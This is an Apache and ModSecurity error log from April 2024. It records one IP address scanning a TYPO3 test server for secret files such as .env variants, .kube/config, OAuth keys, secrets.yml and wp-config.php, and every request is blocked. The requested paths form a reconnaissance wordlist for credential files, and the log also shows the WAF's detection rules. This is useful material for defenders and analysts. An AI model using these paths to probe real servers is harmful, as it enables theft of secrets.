[Wed Apr 24 02:46:54.759542 2024] [authz_core:error] [pid 2736043] [client 91.215.85.29:47310] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloud-config.yml
[Wed Apr 24 02:46:54.761860 2024] [authz_core:error] [pid 2735801] [client 91.215.85.29:47302] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Wed Apr 24 02:46:54.763717 2024] [authz_core:error] [pid 2735802] [client 91.215.85.29:47312] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloudformation
[Wed Apr 24 02:46:54.838227 2024] [authz_core:error] [pid 2735869] [client 91.215.85.29:47384] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Apr 24 02:46:54.863201 2024] [authz_core:error] [pid 2735801] [client 91.215.85.29:47408] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Apr 24 02:46:55.043498 2024] [authz_core:error] [pid 2737954] [client 91.215.85.29:47656] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/elasticbeanstalk
[Wed Apr 24 02:46:55.051677 2024] [authz_core:error] [pid 2737953] [client 91.215.85.29:47570] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/core-cloud-config.yml
[Wed Apr 24 02:46:55.089014 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:47518] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Apr 24 02:46:55.109890 2024] [:error] [pid 2735801] [client 91.215.85.29:47698] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.ci"] [unique_id "ZihWf6Fz6cMgkf756WubbAAAAAU"]
[Wed Apr 24 02:46:55.110045 2024] [:error] [pid 2735801] [client 91.215.85.29:47698] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.ci"] [unique_id "ZihWf6Fz6cMgkf756WubbAAAAAU"]
[Wed Apr 24 02:46:55.110191 2024] [:error] [pid 2735801] [client 91.215.85.29:47698] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.ci"] [unique_id "ZihWf6Fz6cMgkf756WubbAAAAAU"]
[Wed Apr 24 02:46:55.145156 2024] [authz_core:error] [pid 2737954] [client 91.215.85.29:47686] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/elasticbeanstalk
[Wed Apr 24 02:46:55.154119 2024] [authz_core:error] [pid 2737953] [client 91.215.85.29:47676] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.elasticbeanstalk
[Wed Apr 24 02:46:55.178768 2024] [:error] [pid 2736049] [client 91.215.85.29:47692] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZihWf0PmDfluUfGrHd8whQAAAAw"]
[Wed Apr 24 02:46:55.179088 2024] [:error] [pid 2736049] [client 91.215.85.29:47692] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZihWf0PmDfluUfGrHd8whQAAAAw"]
[Wed Apr 24 02:46:55.179315 2024] [:error] [pid 2736049] [client 91.215.85.29:47692] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZihWf0PmDfluUfGrHd8whQAAAAw"]
[Wed Apr 24 02:46:55.190578 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:47710] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/env.config.yml
[Wed Apr 24 02:46:55.210971 2024] [:error] [pid 2737952] [client 91.215.85.29:47730] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ZihWf5a5T-Eh4sHsISHu_AAAAAE"]
[Wed Apr 24 02:46:55.211363 2024] [:error] [pid 2737952] [client 91.215.85.29:47730] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ZihWf5a5T-Eh4sHsISHu_AAAAAE"]
[Wed Apr 24 02:46:55.211646 2024] [:error] [pid 2737952] [client 91.215.85.29:47730] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ZihWf5a5T-Eh4sHsISHu_AAAAAE"]
[Wed Apr 24 02:46:55.212838 2024] [:error] [pid 2735801] [client 91.215.85.29:47734] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.private"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.private"] [unique_id "ZihWf6Fz6cMgkf756WubbQAAAAU"]
[Wed Apr 24 02:46:55.213028 2024] [:error] [pid 2735801] [client 91.215.85.29:47734] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.private"] [unique_id "ZihWf6Fz6cMgkf756WubbQAAAAU"]
[Wed Apr 24 02:46:55.213171 2024] [:error] [pid 2735801] [client 91.215.85.29:47734] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.private"] [unique_id "ZihWf6Fz6cMgkf756WubbQAAAAU"]
[Wed Apr 24 02:46:55.234953 2024] [:error] [pid 2736043] [client 91.215.85.29:47758] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ZihWf8-asUHTxL0b0C1jMgAAAAY"]
[Wed Apr 24 02:46:55.235169 2024] [:error] [pid 2736043] [client 91.215.85.29:47758] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ZihWf8-asUHTxL0b0C1jMgAAAAY"]
[Wed Apr 24 02:46:55.235308 2024] [:error] [pid 2736043] [client 91.215.85.29:47758] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ZihWf8-asUHTxL0b0C1jMgAAAAY"]
[Wed Apr 24 02:46:55.237044 2024] [:error] [pid 2736045] [client 91.215.85.29:47780] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "ZihWf0FFa2jD_JMVQxQBdwAAAAg"]
[Wed Apr 24 02:46:55.237239 2024] [:error] [pid 2736045] [client 91.215.85.29:47780] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "ZihWf0FFa2jD_JMVQxQBdwAAAAg"]
[Wed Apr 24 02:46:55.237391 2024] [:error] [pid 2736045] [client 91.215.85.29:47780] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "ZihWf0FFa2jD_JMVQxQBdwAAAAg"]
[Wed Apr 24 02:46:55.238545 2024] [authz_core:error] [pid 2737954] [client 91.215.85.29:47788] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Wed Apr 24 02:46:55.241325 2024] [:error] [pid 2735802] [client 91.215.85.29:47784] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test.local"] [unique_id "ZihWf-0Vyt9d3d8IWNwHZAAAAAk"]
[Wed Apr 24 02:46:55.241488 2024] [:error] [pid 2735802] [client 91.215.85.29:47784] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test.local"] [unique_id "ZihWf-0Vyt9d3d8IWNwHZAAAAAk"]
[Wed Apr 24 02:46:55.241619 2024] [:error] [pid 2735802] [client 91.215.85.29:47784] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test.local"] [unique_id "ZihWf-0Vyt9d3d8IWNwHZAAAAAk"]
[Wed Apr 24 02:46:55.249602 2024] [authz_core:error] [pid 2737953] [client 91.215.85.29:47790] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Wed Apr 24 02:46:55.273185 2024] [authz_core:error] [pid 2736049] [client 91.215.85.29:47804] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Wed Apr 24 02:46:55.286977 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:47806] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Wed Apr 24 02:46:55.298771 2024] [authz_core:error] [pid 2736042] [client 91.215.85.29:47810] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Wed Apr 24 02:46:55.306183 2024] [authz_core:error] [pid 2737952] [client 91.215.85.29:47814] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Wed Apr 24 02:46:55.308162 2024] [authz_core:error] [pid 2735801] [client 91.215.85.29:47820] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Wed Apr 24 02:46:55.333642 2024] [authz_core:error] [pid 2736043] [client 91.215.85.29:47826] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/github
[Wed Apr 24 02:46:55.336053 2024] [authz_core:error] [pid 2736045] [client 91.215.85.29:47838] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Wed Apr 24 02:46:55.346332 2024] [authz_core:error] [pid 2735800] [client 91.215.85.29:47882] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.helm
[Wed Apr 24 02:46:55.366452 2024] [authz_core:error] [pid 2736049] [client 91.215.85.29:47894] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Wed Apr 24 02:46:55.367083 2024] [:error] [pid 2735869] [client 91.215.85.29:47892] [client 91.215.85.29] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "ZihWfyFJiTM84jIwYn4hhQAAAAA"]
[Wed Apr 24 02:46:55.367271 2024] [:error] [pid 2735869] [client 91.215.85.29:47892] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "ZihWfyFJiTM84jIwYn4hhQAAAAA"]
[Wed Apr 24 02:46:55.367403 2024] [:error] [pid 2735869] [client 91.215.85.29:47892] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "ZihWfyFJiTM84jIwYn4hhQAAAAA"]
[Wed Apr 24 02:46:55.402202 2024] [authz_core:error] [pid 2737952] [client 91.215.85.29:47922] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Wed Apr 24 02:46:55.459865 2024] [authz_core:error] [pid 2736049] [client 91.215.85.29:47978] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/parameters.ini
[Wed Apr 24 02:46:55.475895 2024] [authz_core:error] [pid 2736044] [client 91.215.85.29:48002] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/parameters.yaml
[Wed Apr 24 02:46:55.484076 2024] [authz_core:error] [pid 2735802] [client 91.215.85.29:48012] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/pulumi
[Wed Apr 24 02:46:55.498118 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:48030] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/s3cmd.ini
[Wed Apr 24 02:46:55.579070 2024] [authz_core:error] [pid 2735802] [client 91.215.85.29:48114] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secrets.yml
[Wed Apr 24 02:46:55.592756 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:48122] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.env.yml
[Wed Apr 24 02:46:55.601251 2024] [authz_core:error] [pid 2737953] [client 91.215.85.29:48126] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yml
[Wed Apr 24 02:46:55.621480 2024] [:error] [pid 2736042] [client 91.215.85.29:48128] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/oauth-private.key"] [unique_id "ZihWf_HWUqDDg9bCRI8n0AAAAAM"]
[Wed Apr 24 02:46:55.621822 2024] [:error] [pid 2736042] [client 91.215.85.29:48128] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/oauth-private.key"] [unique_id "ZihWf_HWUqDDg9bCRI8n0AAAAAM"]
[Wed Apr 24 02:46:55.621958 2024] [:error] [pid 2736042] [client 91.215.85.29:48128] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/oauth-private.key"] [unique_id "ZihWf_HWUqDDg9bCRI8n0AAAAAM"]
[Wed Apr 24 02:46:55.623257 2024] [:error] [pid 2737952] [client 91.215.85.29:48138] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/oauth-public.key"] [unique_id "ZihWf5a5T-Eh4sHsISHvAAAAAAE"]
[Wed Apr 24 02:46:55.623535 2024] [:error] [pid 2737952] [client 91.215.85.29:48138] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/oauth-public.key"] [unique_id "ZihWf5a5T-Eh4sHsISHvAAAAAAE"]
[Wed Apr 24 02:46:55.623658 2024] [:error] [pid 2737952] [client 91.215.85.29:48138] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/oauth-public.key"] [unique_id "ZihWf5a5T-Eh4sHsISHvAAAAAAE"]
[Wed Apr 24 02:46:55.682472 2024] [authz_core:error] [pid 2736049] [client 91.215.85.29:48182] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/travis
[Wed Apr 24 02:46:55.710249 2024] [:error] [pid 2737954] [client 91.215.85.29:48222] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "ZihWfyfmXL2PGiZosQ-khQAAAAs"]
[Wed Apr 24 02:46:55.710411 2024] [:error] [pid 2737954] [client 91.215.85.29:48222] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "ZihWfyfmXL2PGiZosQ-khQAAAAs"]
